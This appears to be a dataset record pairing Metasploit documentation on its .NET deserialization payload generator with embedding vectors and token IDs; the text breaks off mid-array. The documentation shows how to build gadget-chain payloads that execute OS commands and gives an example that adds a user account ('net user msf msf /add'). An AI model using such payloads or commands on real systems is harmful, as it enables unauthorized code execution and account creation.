command cmd. this returns a serializedstream object which can be inspected and modified but must formatted ( using # generate _ formatted ) before it is useful. # generate is the primary function and is functionally equivalent to the following. in the future the # generate _ * functions may contain additional options specific to their respective chain or formatter. stream = generate _ gadget _ chain ( cmd, gadget _ chain ) formatted = generate _ formatted ( stream, formatter ) example usagethe following example uses the textformattingrunproperties gadget chain formatted with the losformatter. serialized = : : msf : : util : : dotnetdeserialization. generate ( cmd, # this is the operating system command to run gadget _ chain : : textformattingrunproperties, formatter : : losformatter ) command line toolthe library also has an interface available as a standalone command line tool which is suitable for creating payloads for single - use research purposes. this tool dot _ net
[ 0.15506070852279663, -0.5350714921951294, -0.0802047848701477, 0.8406192064285278, 0.20884546637535095, -0.1965523362159729, -0.6504229307174683, 0.030462611466646194, 0.4795026481151581, 0.19827282428741455, 0.052262526005506516, 0.07825996726751328, 0.34624844789505005, -0.6518070101737976, -0.3842385411262512, -0.33318084478378296, -0.4095664918422699, -0.028393903747200966, -0.6723147034645081, -0.033445559442043304, 0.5147087574005127, 0.21991604566574097, -0.9799081683158875, -0.9589985609054565, -0.39622175693511963, 0.6837996244430542, 0.07292087376117706, -0.012292571365833282, 0.4776182174682617, 0.660706639289856, 0.6420060992240906, -0.6191068291664124, 0.4384993016719818, -0.2679039239883423, 0.13964976370334625, 0.03474561870098114, 0.5905314683914185, 0.17060324549674988, 0.32629233598709106, -1.005566954612732, 0.4845243990421295, -0.5789378881454468, 0.20643773674964905, -0.2762884199619293, -0.29487550258636475, -0.2989756464958191, 0.9346600770950317, -0.7417421936988831, 0.3995427191257477, -0.4995138347148895, 0.3053373396396637, 0.09392614662647247, -0.017189843580126762, 0.054455794394016266, 0.14610673487186432, 0.024453002959489822, 0.044052109122276306, -0.29178547859191895, 0.6702111959457397, 0.16300976276397705, -0.18203842639923096, 0.6342326402664185, 0.148307204246521, -0.5177292823791504, -0.4147295355796814, 0.33666738867759705, 0.3215380609035492, -0.11057586967945099, 0.2003522664308548, -0.18268100917339325, -0.21817392110824585, 0.28867942094802856, -0.5704727172851562, -0.23134201765060425, -0.794861912727356, -0.558102548122406, 0.2367068976163864, 0.0885343849658966, -0.2029677927494049, -0.061465948820114136, -0.46941202878952026, 0.3271836042404175, -0.4635048806667328, -0.27829837799072266, -0.6893680691719055, -0.0639001876115799, 0.18518047034740448, 0.758459210395813, -0.7026169896125793, -0.2662583589553833, -0.15975382924079895, 0.2817762792110443, -0.3850134313106537, -0.41132375597953796, 0.20701055228710175, 0.5284938216209412, -0.04975828528404236, -0.10702647268772125, -0.5413560271263123, -0.21535944938659668, 0.3649531602859497, -0.29997703433036804, -0.1784522831439972, 0.47906383872032166, -0.1160605400800705, 0.008160121738910675, 0.5506351590156555, -0.4060675799846649, -0.002602805383503437, 0.019654035568237305, 0.251947820186615, -0.024833913892507553, 0.5553513765335083, -0.32887473702430725, 0.2505579888820648, 0.2142428755760193, 0.5820528268814087, -0.06568580865859985, -0.388573557138443, 0.9466333389282227, 0.20039962232112885, -0.4655136168003082, -0.009707325138151646, -0.04185780510306358, 0.03166759014129639, -0.42186516523361206, 0.34436967968940735, 0.22432267665863037, -0.3573555648326874, -1.0262603759765625, 0.012303652241826057, 0.5346085429191589, 0.06723079085350037, 0.7206899523735046, -0.13722099363803864, 0.6324645280838013, 0.18539266288280487, 0.218858540058136, 0.2973356544971466, -0.8473063111305237, 0.2870657742023468, 0.4824063181877136, 0.5006163716316223, 1.1725151538848877, 0.5126814246177673, -0.33406615257263184, -0.5615823268890381, 0.04307248070836067, -0.29024121165275574, 0.436340868473053, -0.29663705825805664, 0.4745844602584839, 0.5678198337554932, -0.748884916305542, -0.8872225880622864, 0.1898195743560791, -0.2996528446674347, 0.5456176400184631, -0.3574254512786865, 0.11582573503255844, 0.11601590365171432, 0.39542606472969055, -0.17374758422374725, 0.3217983841896057, 0.07451501488685608, 0.324231892824173, -0.19547080993652344, -0.4215068221092224, -0.4916943609714508, 0.3290989398956299, 0.6948960423469543, 0.5334123969078064, -0.3503900170326233, 0.16201360523700714, 1.3861196041107178, 0.50542151927948, -0.4370940327644348, -0.49139419198036194, 0.551789402961731, 0.27957695722579956, -0.3077057898044586, 0.4519970118999481, 0.061514489352703094, 0.5924860239028931, -0.4937872290611267, -0.01271020621061325, -0.5640785098075867, -0.6999414563179016, -0.2808104455471039, -0.5990520119667053, -0.4210222065448761, 0.06788089126348495, -0.39139673113822937, 0.8941428661346436, 0.6406474113464355, 0.25941190123558044, -0.8594080209732056, -0.39040979743003845, 0.037214215844869614, -1.0626258850097656, -0.495695024728775, -0.10322702676057816, -0.20227934420108795, 0.3606223165988922, -0.4118961691856384, -0.18633048236370087, 0.9920697212219238, 0.5988219976425171, -0.35997211933135986, 0.8939852714538574, 0.3793163001537323, 0.11165289580821991, 0.1789967119693756, 0.2971396744251251, 0.19078822433948517, 0.028530657291412354, -0.6728574633598328, 0.4664476811885834, -0.7562885880470276, 0.3797719478607178, 0.2892014682292938, 0.2699325680732727, 0.5553427338600159, 0.44048166275024414, -0.09963256120681763, -0.6736354827880859, 0.579462468624115, 0.2211412638425827, -0.6136640310287476, 0.3646317422389984, -0.28256791830062866, 0.9245278835296631, 0.6978461146354675, 0.5138307213783264, -0.3524974584579468, -0.15434888005256653, -0.24753673374652863, -0.17450545728206635, 0.15633238852024078, -0.11307274550199509, -0.18461015820503235, 0.05560009181499481, 0.13842754065990448, 0.7759186029434204, 0.47549405694007874, -0.01014253031462431, 0.4205825626850128, 0.03433232381939888, 0.10663793981075287, 0.3760726749897003, -0.1586075723171234, 0.39595189690589905, 0.5813427567481995, -0.2095053493976593, -0.5498398542404175, -0.755247175693512, 0.18085980415344238, 0.5747391581535339, -0.18942929804325104, -0.6346842646598816, -0.20826879143714905, 0.0027108383364975452, -0.3386102318763733, -0.14519016444683075, 0.40176770091056824, 0.4597024917602539, -0.028536861762404442, 0.34788650274276733, 0.08314838260412216, -0.16523998975753784, -0.38425111770629883, -0.38445496559143066, -0.7332473397254944, -0.7649292945861816, -1.0014475584030151, 0.006025344133377075, 0.5768651366233826, -0.3207029700279236, 0.623115062713623, -0.5171833634376526, -0.6094368100166321, 0.1241421103477478, -0.12574610114097595, 0.36417442560195923, 0.4277207851409912, -0.20710259675979614, -1.327109456062317, 0.13352113962173462, 0.09299657493829727, 0.6576550006866455, -0.5920289754867554, -0.03827729821205139, 0.38018614053726196, -0.3184082806110382, -0.32067689299583435, 0.017125902697443962, 0.10220727324485779, -0.17913946509361267, -0.29707399010658264, -0.37252482771873474, 0.4311957359313965, 0.14196649193763733, 0.6436184048652649, 0.22692084312438965, -0.043603695929050446, 0.5864104628562927, 0.27712011337280273, 0.0479266420006752, 0.8316795229911804, 0.4075852632522583, -0.38157200813293457, 0.6261510848999023, -0.33009690046310425, 0.6509503126144409, -0.10940258204936981, 0.5436164140701294, -0.055614959448575974, 0.7126228213310242, -0.17875169217586517, 0.1054089367389679, -0.1988764852285385, 0.10787361860275269, -0.5436018705368042, -0.42327308654785156, -0.4630662798881531, -0.032699234783649445, -0.5066948533058167, -0.7418527007102966, 0.7828724384307861, -0.4122445285320282, -0.5271146893501282, 0.3756268620491028, -0.20798644423484802, 0.6198608875274658, 0.11593189090490341, 0.262235164642334, 0.4439474642276764, -0.2893598675727844, 0.3415774703025818, -0.2749490439891815, -0.4016237258911133, 0.17826424539089203, 0.5983875393867493, -0.18296991288661957, -0.42753005027770996, 0.6995401382446289, 0.8653081655502319, -0.1648164987564087, -0.15608035027980804, -0.1434476673603058, -0.6377150416374207, 0.09023112058639526, 0.5379311442375183, -0.08953281491994858, 0.5933518409729004, 0.33798834681510925, -0.4630725681781769, -0.16618308424949646, -0.6399362683296204, 0.7203166484832764, -0.106789730489254, 0.08805271238088608, -0.08154086768627167, 0.5319018959999084, -0.18265539407730103, -0.0360708124935627, 1.0252063274383545, 0.10744956135749817, 0.015095444396138191, 0.2883222699165344, 0.1371804177761078, -0.3066892623901367, 0.3834097981452942, 0.18575870990753174, 0.005673409905284643, -0.5530463457107544, 0.09603726118803024, -0.15435579419136047, 0.6651642322540283, -0.19339358806610107, -0.5411577224731445, -0.49202072620391846, 0.536780595779419, -0.08837880194187164, 0.23222702741622925, -0.3948308825492859, -0.06920848786830902, 0.2703455686569214, 0.19696375727653503, 0.04739471524953842, 0.8536317348480225, -0.0976654663681984, 0.3375135660171509, -0.4334193170070648, -0.3723169267177582, -0.3195749819278717, 0.36632540822029114, 0.7641173601150513, 0.5677544474601746, 0.6652300953865051, 0.37176454067230225, 0.6961577534675598, -0.7569108009338379, 0.5192066431045532, -0.8047775626182556, 0.42384496331214905, -0.06136951223015785, 0.7233851552009583, -0.3810775578022003, -0.23691321909427643, -0.20851312577724457, 0.05686954781413078, -0.6406791806221008, -0.09806858003139496, 0.38000789284706116, 0.01475671585649252, -0.7443321943283081, -0.37109220027923584, 0.24375182390213013, -0.13671201467514038, -0.28249549865722656, -0.30558425188064575, -0.154836967587471, 0.15788103640079498, 0.429338276386261, -0.4415211081504822, 0.039089616388082504, -0.7706618309020996, -0.08076483756303787, 0.6782926917076111, 0.14455121755599976, -0.2835654616355896, -0.8042078614234924, -0.6053962111473083, -0.5920087695121765, 0.25827428698539734, 0.22554562985897064, 0.8126353025436401, -0.6336753964424133, -0.3982000946998596, -0.13371378183364868, 0.2683209478855133, -0.04756731912493706, -0.4710198938846588, -0.258100301027298, 0.28937435150146484, 0.24484571814537048, 0.12666288018226624, -0.45129790902137756, -0.3492056429386139, 0.4229884743690491, -0.8798727989196777, -0.025561098009347916, -0.5895472764968872, 0.8435883522033691, -0.06496114283800125, -0.6105473637580872, -0.04932812228798866, 0.17395876348018646, -0.5810636878013611, -0.05143320560455322, -0.48743703961372375, 0.5306536555290222, -0.2128550261259079, -0.1215178370475769, 0.8614385724067688, 0.06633034348487854, -0.21528548002243042, 0.3989984095096588, 0.3102675676345825, -0.23473356664180756, 0.07038110494613647, -0.12228192389011383, -0.5789985656738281, -0.03967476263642311, -0.28275159001350403, 0.511563241481781, 0.26675912737846375, 0.14108842611312866, 0.18836623430252075, -0.40896913409233093, 0.5775408744812012, -0.3330993354320526, 0.5089786648750305, -0.30340516567230225, -0.7768054604530334, -0.3614956736564636, 0.5274596214294434, 0.038322992622852325, 0.2209431678056717, 0.1660199612379074, 0.07315295189619064, -0.4493262469768524, 0.3228808343410492, -1.0111652612686157, -0.8663642406463623, -0.6447912454605103, -0.14906910061836243, 0.12146139144897461, -0.07870995998382568, 0.3414461016654968, -0.1882556974887848, -0.2255474179983139, 0.8584513664245605, 0.007700064219534397, 0.7232227921485901, -0.8300285935401917, -0.07196542620658875, -0.4447958171367645, 0.03966868296265602, 0.008841747418045998, 0.008195823058485985, -0.19096770882606506, 0.15079262852668762, 0.26067787408828735, 1.055096983909607, 0.4290722608566284, -0.6644282341003418, -0.3687865436077118, 0.5892125964164734, 0.1463799625635147, -0.6442992091178894, -0.10730108618736267, 1.1453293561935425, -0.32119688391685486, 0.1760593056678772, -0.4549274742603302, 0.2035118192434311, -0.5590615272521973, -0.8275200128555298, -0.552794873714447, -0.23059196770191193, 0.6094045639038086, -0.5783543586730957, -0.15462318062782288, 0.014043932780623436, 0.19430099427700043, -0.23530220985412598, -1.0615614652633667, -0.21846191585063934, -0.2745262384414673, 0.5888582468032837, 0.347147673368454, -0.3714776337146759, -0.39458051323890686, -0.7476161122322083, -0.10493334382772446, 0.03688514232635498, 0.39230141043663025, -0.006779140327125788, 0.009746428579092026, 0.6936495304107666, 0.38309624791145325, 0.008044207468628883, -0.1621980518102646, 0.04874998703598976, 0.04646559804677963, 0.48637276887893677, -0.5418961048126221, 0.6584142446517944, -0.3095034658908844, 0.6764319539070129, -0.5036841630935669, -0.21478722989559174, -0.170051708817482, -0.48373258113861084, 0.7514773011207581, 0.1230257898569107, 0.21987852454185486, -0.8029688596725464, -0.27265986800193787, -0.17102473974227905, 0.8499717712402344, 0.5800570845603943, -0.13975948095321655, -0.5139319896697998, -0.2191963642835617, -0.5747828483581543, -1.472037672996521, 0.3641798198223114, -0.19017688930034637, -0.24927328526973724, -0.08530502021312714, -0.024034958332777023, 0.7493768930435181, -0.2810482084751129, 0.2811006009578705, 1.1303678750991821, 0.2695763111114502, 0.31670719385147095, -0.3132181465625763, 0.5686763525009155, 0.7731108069419861, 0.43712741136550903, 0.13965484499931335, -0.42284783720970154, -0.23635096848011017, -0.10499650239944458, -0.44522467255592346, -0.5719791054725647, -0.4917074739933014, 0.1907036453485489, 0.27025699615478516, -0.8271989822387695, 0.5500262379646301, -0.4311811625957489, -0.4569615125656128, -0.265991747379303, -0.2574732303619385, 0.13084816932678223, -0.3882126212120056, 0.8381974697113037, 0.09020551294088364, 0.23492823541164398, -0.14345747232437134, 0.5183061361312866, -0.9433861970901489, -0.09584690630435944, 0.12929783761501312, 0.28319063782691956, -0.6770715117454529, 0.8819205164909363, -0.5222271680831909, -0.18537163734436035, -0.1715916097164154, -0.7835474014282227, -0.07656101137399673, -0.3608914315700531, -0.7096824049949646, -0.027479810640215874, 0.25744205713272095, 0.19635511934757233, 0.0872783437371254, 0.4699442684650421, 0.3609768748283386, 0.023920821025967598, -0.6712242364883423, 0.4320286214351654, -0.46992650628089905, 0.10886237770318985, 0.21114084124565125, -0.4006443917751312, -0.1144547387957573, -0.8172488808631897, -0.7359864115715027, -0.008643853478133678, -0.45330509543418884, 0.8265284895896912, -0.46877971291542053, 0.18529418110847473, -0.05699315667152405, 0.3100482225418091, 0.8597835302352905, -0.32400235533714294, 0.006307021714746952, 1.1613082885742188, 0.30630791187286377, -0.4570239782333374, -0.343260794878006, -0.3523094356060028, -0.22524458169937134, -0.07992561906576157, -0.40975019335746765, -0.5092577338218689, -0.13969488441944122, -0.10221707075834274, -0.4791528284549713, -0.3467096984386444, -0.9343664646148682, -0.7105802297592163, 0.21086755394935608, 0.23249731957912445, 0.09284117072820663, 0.07670539617538452, 0.1051420345902443, 0.01612432487308979, -0.5841842889785767, -0.5796756148338318, 0.7154759764671326, -0.616186797618866, 0.8078858256340027, -0.5249401330947876, 0.736257016658783, -0.8868452906608582, 0.18880565464496613, 0.18510578572750092, -0.18960945308208466, -0.41941940784454346, -0.4564819931983948, -0.24376872181892395, -0.07085243612527847, -0.5508487224578857, 0.8684436678886414, -0.8988257050514221, -0.09565283358097076, 0.38497278094291687, -1.2584359645843506, 0.5080389976501465, 1.0490869283676147, -0.30315232276916504, -0.24446099996566772, 0.4658465087413788, -0.02327156439423561, 0.33311378955841064, -0.32443472743034363, -0.028368204832077026, 0.05883243307471275, 0.11586255580186844, 0.8252183794975281, 0.29213815927505493, -0.5201685428619385, 0.2215811312198639, -0.05483433976769447, -0.4803687632083893, -0.05488080158829689, -0.5527169108390808, 0.5810391306877136, 0.022590890526771545, 0.04046960547566414, -0.3157255947589874, 0.5046897530555725, 0.4351806342601776, 0.5684352517127991, -0.2885749638080597, 0.8803977370262146, 0.4506480097770691, -0.22077398002147675, -0.17507340013980865, 0.34821364283561707, 0.4407350718975067, -0.523962676525116, -0.36672475934028625, -0.07087823003530502, -0.6056268811225891, 0.44349125027656555, 0.5031123161315918, -0.28366196155548096, 0.165873184800148, -0.3346713185310364, 0.28120678663253784, 0.5312010049819946, 0.23478884994983673, 0.26736488938331604, 0.7829110026359558, -0.06314975768327713, -0.43761351704597473, 0.27918171882629395, -0.5830503106117249, 0.3698282241821289, 0.17354804277420044, -0.0597822405397892, 0.12458623945713043, -0.6318239569664001, -0.2373274266719818, -0.6382238268852234, -0.18255768716335297, 0.2583082318305969, 0.3800807595252991, 0.525966465473175, 0.043546441942453384, 1.3619306087493896, -0.5390488505363464, -0.6135919094085693, -0.43393754959106445, 0.596274733543396, -1.2118351459503174, -1.1110893487930298, -0.11429133266210556, 0.488369882106781, -0.2402368038892746, 0.10301333665847778, -0.48709529638290405, 0.0750025287270546, 0.549636721611023, 0.25460872054100037, -0.16700543463230133, -0.23256820440292358, -0.2772611081600189, 0.6881590485572815, -0.3957800567150116, -0.1507941335439682, 0.09383481740951538, 0.40431416034698486, 0.9466634392738342, -0.08831838518381119, -0.5417945981025696, 0.4638736844062805, 0.5337674617767334, -0.015561569482088089, 0.4112590253353119, 0.39190614223480225, -0.08715935051441193, -0.2003636509180069, 0.18245366215705872, -0.38843080401420593, -0.08605147898197174, -0.305454820394516, 0.39417505264282227, 0.16516387462615967, 0.1913486123085022, 0.6034266352653503, -0.3095795512199402, 0.22124233841896057, 0.2712779939174652, 0.19494137167930603, -0.02289903722703457, 0.6586915850639343, -0.18272456526756287, -0.27463987469673157, -0.21570922434329987, -0.1095944494009018, 0.11350148171186447, -0.15392251312732697, 0.10695577412843704, -0.01248680055141449, -0.0025363091845065355, 0.1422603875398636, -0.6965948939323425, 0.3709999918937683, -0.3410000503063202, -0.007445537950843573, 0.39993470907211304, -0.15787222981452942, -0.699095606803894, 1.319949746131897, 0.8762203454971313, 0.5737159848213196, 0.21222668886184692, 0.489157497882843, -0.39437252283096313, 0.6847888231277466, 0.05761216580867767, 0.03332215175032616, -0.3841788172721863, 0.533112108707428, 0.24262942373752594, -0.6312994360923767, -0.4525374472141266, 0.3222979009151459, 0.08238961547613144, -0.21563293039798737, 0.639022707939148, -0.10094475001096725, 0.2892921566963196, -0.41940394043922424, 0.45379942655563354, 0.07767819613218307, 0.2832029163837433, 0.05521606653928757, -0.32203659415245056, -0.27804240584373474, 0.6071199774742126, 0.013913302682340145, 0.9292552471160889, 0.19142219424247742, 0.4321727752685547, -0.6063422560691833, 0.37002629041671753, -0.20577359199523926, 0.025999518111348152, -0.37858477234840393, 0.024003392085433006, -0.1865268349647522, -0.11392955482006073, 0.16359078884124756, -0.41690877079963684, 0.510147750377655, -0.22570563852787018, 0.13284394145011902, -0.8622979521751404, 0.6577640175819397, -0.3517376780509949, -0.7322098612785339, 0.28132709860801697, 0.19230984151363373, -0.5392941236495972, -0.31467166543006897, 0.5071139335632324, -0.21772274374961853, 0.30092960596084595, -0.29511672258377075, -0.47625482082366943, -0.6511187553405762, -0.28518420457839966, 0.3368701636791229, 0.5182135105133057, -0.09000805020332336, 0.06675142794847488, -0.213277205824852, -1.2952576875686646, -1.2217493057250977, -0.5072363615036011, -0.19703146815299988, -0.5310009717941284, 0.8514428734779358, 0.30695128440856934, 0.35095858573913574, 0.10022198408842087, -0.10459596663713455, -0.2731635272502899, 0.032521769404411316, 0.7642526626586914, -0.541755199432373, 0.4466492533683777, 0.40177232027053833, 0.10521604865789413, -0.08246107399463654, -0.37890785932540894, 0.5785371661186218, -0.1419135481119156, 0.0943366140127182, -0.24315471947193146, -0.05846482887864113, -0.19741599261760712, -0.16828683018684387, -0.38719454407691956, -0.04184379056096077, 0.053886886686086655, -0.3395270109176636, -0.6793702244758606, -0.06963446736335754, -0.23326388001441956, -0.14593349397182465, -0.12168226391077042, -0.18902061879634857, 0.38081198930740356, -0.13709579408168793, 0.34518638253211975, -0.8834598660469055, 4.568281173706055, 0.3146390914916992, -0.1551743745803833, 0.15412093698978424, 0.16658276319503784, 0.9715842604637146, 0.6405584216117859, -0.6752007603645325, 0.2910701632499695, -0.19400517642498016, 0.017271678894758224, 0.04334735497832298, -0.06142091751098633, 0.23031090199947357, 0.27238431572914124, 0.8767644166946411, -0.9188171625137329, 0.9430171847343445, -0.09224364906549454, -0.9682771563529968, -1.0725058317184448, -0.16773636639118195, -0.24673476815223694, 0.31987687945365906, -0.19382528960704803, 0.012256755493581295, -0.05868830159306526, -0.26078617572784424, -0.3089572489261627, 0.29763469099998474, -0.3367787301540375, -0.6193904876708984, -0.20775732398033142, -0.46115338802337646, -0.42842671275138855, 0.20172496140003204, 0.4133417308330536, -0.7343908548355103, 0.2659851610660553, -0.4749562442302704, 0.2278738170862198, -0.4876726567745209, -0.10658271610736847, -0.08434676378965378, 0.05718645453453064, 0.7574045062065125, -0.5232387781143188, 0.23145517706871033, 0.32454466819763184, -0.5619913935661316, 1.3136684894561768, 0.3699268400669098, 0.9516670107841492, -0.35175058245658875, -0.8475737571716309, 0.8343679308891296, 0.025104103609919548, -0.15574735403060913, -0.13528747856616974, -0.24926072359085083, 1.0156054496765137, -0.17566992342472076, -0.20702940225601196, -0.2403419315814972, -1.1491754055023193, 0.6834717392921448, -0.8496367335319519, 0.6844784617424011, -0.02411620505154133, -0.350210040807724, -0.3621179759502411, -0.34234023094177246, -0.5480181574821472, -0.3896034359931946, 0.8326924443244934, -0.8230482935905457, -0.04514722898602486, -0.11163054406642914, 0.4052943289279938, -0.06761772930622101, -0.219045028090477, -0.43681833148002625, -1.1583032608032227, 0.25554507970809937, 0.5330842733383179, 0.3092450797557831, -0.18089082837104797, -1.3051923513412476, 0.42618879675865173, 0.5259913802146912, 0.07465901970863342, 0.22055672109127045, -0.2384914755821228, 0.28908970952033997, 0.23276367783546448 ]
[ 101, 18804, 13102, 4135, 4183, 2950, 1037, 3075, 2005, 15929, 16594, 1012, 5658, 4078, 11610, 22731, 4491, 1012, 2478, 2009, 2306, 1037, 11336, 2003, 2200, 3442, 2830, 1010, 1996, 11336, 3166, 2074, 3791, 2000, 2113, 2048, 2477, 1024, 1996, 11721, 24291, 4677, 1998, 1996, 4289, 3334, 1012, 1996, 3075, 3594, 1996, 2168, 3415, 2005, 2169, 1997, 2122, 5300, 2004, 1996, 1061, 17063, 11610, 2140, 1012, 5658, 2622, 2005, 21778, 1010, 2348, 1996, 18804, 13102, 4135, 4183, 3075, 2069, 6753, 1037, 16745, 1997, 1996, 15380, 1012, 2490, 8185, 10760, 2206, 2795, 22106, 1996, 3569, 11721, 24291, 8859, 1010, 4289, 7747, 1998, 1996, 21778, 1997, 2169, 1012, 11721, 24291, 4677, 100, 3937, 8192, 10760, 3075, 2003, 2284, 1999, 5796, 2546, 1024, 1024, 21183, 4014, 1024, 1024, 11089, 7159, 6155, 11610, 22731, 1998, 3397, 1996, 2206, 4725, 2029, 2024, 3832, 2005, 2224, 2011, 11336, 6048, 1012, 1001, 9699, 1006, 4642, 2094, 1010, 11721, 24291, 1035, 4677, 1024, 1010, 4289, 3334, 1024, 1007, 2023, 3853, 2097, 9699, 1037, 27289, 18093, 2000, 15389, 1996, 9675, 4082, 2291, 3094, 4642, 2094, 1012, 1996, 3094, 2003, 27289, 2478, 1996, 9675, 11721, 24291, 1035, 4677, 1998, 4289, 3064, 2007, 1996, 9675, 4289, 3334, 1012, 1996, 11721, 24291, 1035, 4677, 1998, 4289, 3334, 7047, 2097, 2022, 3563, 2000, 1996, 18130, 2008, 2003, 2108, 6472, 1012, 2023, 4972, 5651, 1037, 5164, 1012, 1001, 9699, 1035, 4289, 3064, 1006, 5460, 1010, 4289, 3334, 1024, 1007, 4289, 1037, 27289, 21422, 4874, 1010, 2004, 2580, 2011, 1001, 9699, 1035, 11721, 24291, 1035, 4677, 1012, 1996, 5460, 2097, 2022, 4289, 3064, 2478, 1996, 9675, 4289, 3334, 1998, 2513, 2004, 1037, 5164, 1012, 1001, 9699, 1035, 11721, 24291, 1035, 4677, 1006, 4642, 2094, 1010, 11721, 24291, 1035, 4677, 1024, 1007, 3443, 1037, 11721, 24291, 4677, 2000, 2448, 1996, 9675, 4082, 2291, 3094, 4642, 2094, 1012, 2023, 5651, 1037, 27289, 21422, 4874, 2029, 2064, 2022, 20456, 1998, 6310, 2021, 2442, 4289, 3064, 1006, 2478, 1001, 9699, 1035, 4289, 3064, 1007, 2077, 2009, 2003, 6179, 1012, 1001, 9699, 2003, 1996, 3078, 3853, 1998, 2003, 8360, 2135, 5662, 2000, 1996, 2206, 1012, 1999, 1996, 2925, 1996, 1001, 9699, 1035, 1008, 4972, 2089, 5383, 3176, 7047, 3563, 2000, 2037, 7972, 4677, 2030, 4289, 3334, 1012, 5460, 1027, 9699, 1035, 11721, 24291, 1035, 4677, 1006, 4642, 2094, 1010, 11721, 24291, 1035, 4677, 1007, 4289, 3064, 1027, 9699, 1035, 4289, 3064, 1006, 5460, 1010, 4289, 3334, 1007, 2742, 8192, 10760, 2206, 2742, 3594, 1996, 3793, 14192, 19321, 2075, 15532, 21572, 4842, 7368, 11721, 24291, 4677, 4289, 3064, 2007, 1996, 3050, 14192, 20097, 1012, 27289, 1027, 1024, 1024, 5796, 2546, 1024, 1024, 21183, 4014, 1024, 1024, 11089, 7159, 6155, 11610, 22731, 1012, 9699, 1006, 4642, 2094, 1010, 1001, 2023, 2003, 1996, 4082, 2291, 3094, 2000, 2448, 11721, 24291, 1035, 4677, 1024, 1024, 3793, 14192, 19321, 2075, 15532, 21572, 4842, 7368, 1010, 4289, 3334, 1024, 1024, 3050, 14192, 20097, 1007, 3094, 2240, 6994, 10760, 3075, 2036, 2038, 2019, 8278, 2800, 2004, 1037, 26609, 3094, 2240, 6994, 2029, 2003, 7218, 2005, 4526, 18093, 2015, 2005, 2309, 1011, 2224, 2470, 5682, 1012, 2023, 6994, 11089, 1035, 5658 ]
metasploit
132.txt
0
. rb is available in the tools / payloads / ysoserial directory. the arguments for this tool are aligned with those of ysoserial. net, allowing the arguments of basic invocations to be the same. it should be noted however that the supported gadgets and formatters are not the same. help output : usage :. / dot _ net. rb [ options ] generate a. net deserialization payload that will execute an operating system command using the specified gadget chain and formatter. available formatters : * binaryformatter * losformatter * soapformatter available gadget chains : * textformattingrunproperties * typeconfusedelegate * windowsidentity example :. / dot _ net. rb - c " net user msf msf / add " - f binaryformatter - g textformattingrunproperties specific options : - c, - - command < string > the command to run - f, - - formatter < string > the formatter to use ( default : binaryformatter ) - g, - - gadget < string > the gadget chain to use ( default : textformattingrunproperties ) - o, - - output < string > the output format to use ( default : raw, see : - - list - output - formats ) - - list - output - formats list available output formats, for use with - - output - h, - - help show this message the - g / - - gadget option maps to the gadget _ chain argument for the generate functions while the - f / - - formatter arguments maps to the formatter argument. making changesadding new gadget chains and formatters involves creating a new file in the respective library directory : lib / msf / util / dot _ net _ deserialization. the β€œ native ” gadget chain type is implemented following the ms - nrbf format and the bindata records as defined in types / subdirectory. once the new gadget chain or formatter is implemented, it needs to be added to the main library file ( dot _ net _ deserialization. rb ). since serialization chain generate is deterministic, a unit test should be added for any new gadget chain to ensure that the checksum of the binaryformatter representation is consistent. further readingsince the. net deserialization gadgets run operating system commands, the following resources can be helpful for module developers
[ 0.049800463020801544, -0.8449271321296692, -0.33673858642578125, 0.5233058333396912, 0.049057021737098694, 0.36577847599983215, -0.16985443234443665, 0.2703126072883606, 0.6535392999649048, 0.19557122886180878, 0.1676914393901825, -0.8875162601470947, 0.37053582072257996, -0.2978444993495941, -0.4580191373825073, -0.68619704246521, -0.7202641367912292, -0.1757090985774994, -0.8820074796676636, -0.11322862654924393, 0.5821802616119385, 0.26783081889152527, -0.5156123042106628, -1.1484839916229248, -0.2868652045726776, 0.523076593875885, 0.17038454115390778, 0.3913654685020447, 0.5833908915519714, 0.5490000247955322, 0.34210166335105896, -0.7388162016868591, 0.5033577680587769, -0.6053963899612427, -0.026941459625959396, 0.21637028455734253, 0.263604074716568, -0.19786764681339264, 0.08628644049167633, -0.9570665955543518, 0.8067924976348877, -0.00855445209890604, 0.16767096519470215, -0.07355798035860062, -0.6387750506401062, -0.5604392290115356, 0.6421164870262146, -0.8263763189315796, 0.33768174052238464, -0.4947536289691925, 0.6904804110527039, 0.15677820146083832, 0.290537565946579, 0.29828187823295593, 0.08221610635519028, 0.1367294043302536, 0.3887694478034973, 0.3267645239830017, 0.3698968291282654, 0.05485736206173897, -0.3522108495235443, 1.043810486793518, 0.28475531935691833, -0.712652325630188, -0.14589352905750275, 0.3606588542461395, -0.02831963263452053, -0.14484858512878418, -0.03211322799324989, -0.2943500876426697, -0.06413249671459198, 0.9781584739685059, -0.3403073847293854, -0.7532293796539307, -0.8010971546173096, -0.27857834100723267, 0.15583565831184387, 0.11437123268842697, -0.08688150346279144, 0.2103760987520218, -0.13526608049869537, 0.5767247080802917, -0.23974043130874634, -0.27917948365211487, -0.5563262104988098, -0.2347852885723114, 0.24120713770389557, 0.7269002795219421, -0.5938397645950317, 0.12482865899801254, 0.04521998018026352, 0.5723727345466614, -0.5791903138160706, 0.030544821172952652, 0.4704025685787201, 0.2686503231525421, -0.49324288964271545, 0.06837309896945953, -0.006273226346820593, -0.3819144666194916, 0.5750200152397156, 0.16512635350227356, -0.3205191195011139, 0.3509872555732727, -0.27750515937805176, 0.1703980714082718, 1.005936622619629, -0.04685880243778229, -0.022703466936945915, -0.39850735664367676, 0.4718630015850067, 0.155328631401062, 0.40632325410842896, -0.14296813309192657, 0.20082642138004303, 0.8018732666969299, 0.48171374201774597, -0.12517400085926056, -0.26954004168510437, 0.6320909261703491, -0.2127722203731537, 0.29818782210350037, 0.04939454793930054, -0.17232105135917664, 0.1920604258775711, -0.5497795939445496, 0.8578614592552185, 0.11035331338644028, -0.5368155837059021, -0.6432047486305237, 0.17644381523132324, -0.12736745178699493, -0.019298799335956573, 0.7772922515869141, -0.2305837720632553, 0.3301324248313904, 0.15799686312675476, 0.3727230131626129, 0.63910311460495, -1.176751971244812, -0.0917728841304779, 0.02414974570274353, 0.45987236499786377, 1.7497048377990723, 0.10128011554479599, -0.08748304098844528, -0.4201088547706604, 0.15832838416099548, -0.637128472328186, 0.5249793529510498, -0.2742219567298889, 0.2099674791097641, 0.4027216136455536, -0.17823250591754913, -0.7510779500007629, -0.23262502253055573, -0.11022163182497025, 0.5145037770271301, 0.0727909654378891, -0.33047041296958923, -0.42752254009246826, 0.2003403753042221, -0.6420901417732239, 0.22991499304771423, 0.21034476161003113, 0.42909112572669983, -0.40106746554374695, -0.5913960337638855, -0.202001690864563, -0.07308855652809143, 0.627639651298523, 0.3107442855834961, 0.10673890262842178, 0.45825648307800293, 0.6685891151428223, 0.6503451466560364, -0.4539952278137207, -0.11011116951704025, 